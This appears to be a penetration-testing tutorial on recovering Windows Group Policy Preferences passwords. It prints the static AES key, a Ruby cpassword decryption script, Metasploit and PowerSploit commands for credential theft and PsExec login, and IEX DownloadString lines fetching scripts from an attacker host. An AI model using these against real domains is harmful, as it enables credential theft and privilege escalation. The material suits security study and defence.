Group policy preferences allows domain admins to create and deploy across the domainlocal users and local administrators accounts. This feature was introduced in windows 2008 Server however it can be abused by an attacker since the credentials of theseaccounts are stored encrypted and the public key is published by Microsoft.This leaves the door open to any user to retrieve these files and decryptthe passwords storedin order to elevate access.
These files are stored in a shared directory in the domain controllerand any authenticated user in the domain hasread access to these files since it is neededin order to obtaingroup policy updates.
Thestatic key which can decryptpasswords stored in Group Policy Preferencescan be seen below:
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b Manual ExploitationIn order to exploit this issue manually it is needed to manually browse to the Groups.xml file which is stored in a shared directory inthe domain controller and obtain the value of the attribute cpassword .
GPP cpassword Value
Then this value can be passed into another tool which can decrypt the value.
Decrypting GPP Passwords Manually
Chris Gates wrote a ruby script for decrypting cpassword values.
require 'rubygems' require 'openssl' require 'base64' encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" def decrypt(encrypted_data) padding = "=" * (4 - (encrypted_data.length % 4)) epassword = "#{encrypted_data}#{padding}" decoded = Base64.decode64(epassword) key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\ x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\ x33\xb6\x6c\x1b" aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") aes.decrypt aes.key = key plaintext = aes.update(decoded) plaintext << aes.final pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion return pass end blah = decrypt(encrypted_data) puts blah MetasploitDecrypting passwords that are stored in the Group Policy Preferences can be doneautomatically though Metaasploit. The following post exploitation modulewill obtain and decrypt the cPassword fromthe Groups.xml file which is stored in the SYSVOL.
post/windows/gather/credentials/gpp
Metasploit Decrypting GPP Passwords
Since domain administrators canset up local administrators accountsthrough the Group Policy this can lead to privilege escalation. These credentials can be usedwith the PsExec Metasploit module in order to successfully login to the workstation as SYSTEM.
Metasploit PsExec Usage
PsExec Authentication as Administrator
PowerSploitAlternatively the same results can be achieved throughPowerSploit. There are two moduleswhich can obtain and decrypt the cPassword from the Groups.xml file eitherlocally or directly from the domain controller.
Get-CachedGPPPassword //For locally stored GP Files Get-GPPPassword //For GP Files stored in the DC
PowerSploit Get-CachedGPPPassword
PowerShell via MetasploitAs there are many PowerShell scripts that can be used for post exploitation it is possible to use Metasploit in order to inject a PowerShell payload into a specific process.This could allowthe execution ofPowerShell scripts directly from memory.
Injecting PowerShell Payload into a Process
Then from the interactive PowerShell session the Invoke-Expression cmdlet could be utilized in order to drop and execute any PowerShell script that is locally hosted.
IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.3/tmp/PowerUp.ps1") IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.3/tmp/PowerView.ps1")
Executing PowerSploit Modules via Metasploit